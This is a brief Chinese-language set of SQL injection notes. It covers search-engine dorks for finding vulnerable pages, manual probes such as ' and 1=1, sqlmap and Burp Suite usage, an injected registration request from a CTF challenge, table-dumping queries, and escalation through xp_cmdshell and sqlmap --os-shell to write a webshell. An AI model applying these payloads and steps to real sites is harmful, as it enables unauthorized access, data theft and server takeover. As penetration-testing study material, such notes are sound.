SQL注入流程
01 寻找SQL注入点
寻找SQL注入点
无特定目标:
inurl:.php?id=
有特定目标:
inurl:.php?id=site:target.com
// jsp sid
工具爬取:
spider,对搜索引擎和目标网站的链接进行爬取
注入识别
手工简单识别:
'
and 1=1 / and 1=2
and '1'='1 / and '1'='2
and 1 like 1 / and 1 like 2
工具识别:
sqlmap -m filename (filename中保存检测目标)
sqlmap --crawl(sqlmap对目标网站进行爬取,然后依次进行测试)
高级识别:
扩展识别广度和深度:
SqlMap --level 增加测试级别,对header中相关参数也进行测试
sqlmap -r filename (filename中为网站请求数据)
利用工具提高识别效率:
BurpSuite + SqlMap
BurpSuite拦截所有浏览器访问提交的数据
BurpSuite扩展插件,直接调用SqlMap进行测试
一些Tips:
可以在参数后键入“*” 来确定想要测试的参数
可能出现注入的点:新闻、登录、搜索、留言… …
站在开发的角度去寻找
python sqlmap.py -r 1.txt
burp sqlmap 扩展
Burp-> Extender->BApp Store -> SQLiPy Sqlmap
代码审计:
搜索关键代码和函数
梳理业务流程
强网杯WEB “python is the best language”
http://test.com/register
POST:
username=test&email=t@t.com&password=123&password2=123&submit=Register
username=test&email=t@t.com' and '1' = '1&password=123&password2=123&submit=Register
02 SQL注入流程
数据获取
web.mdb
select [*] from admin
select [*] from system
select [username] from system
select [name] from system
提权
xp.cmdshell
--os-shell // 执行系统命令 写webshell到网站目录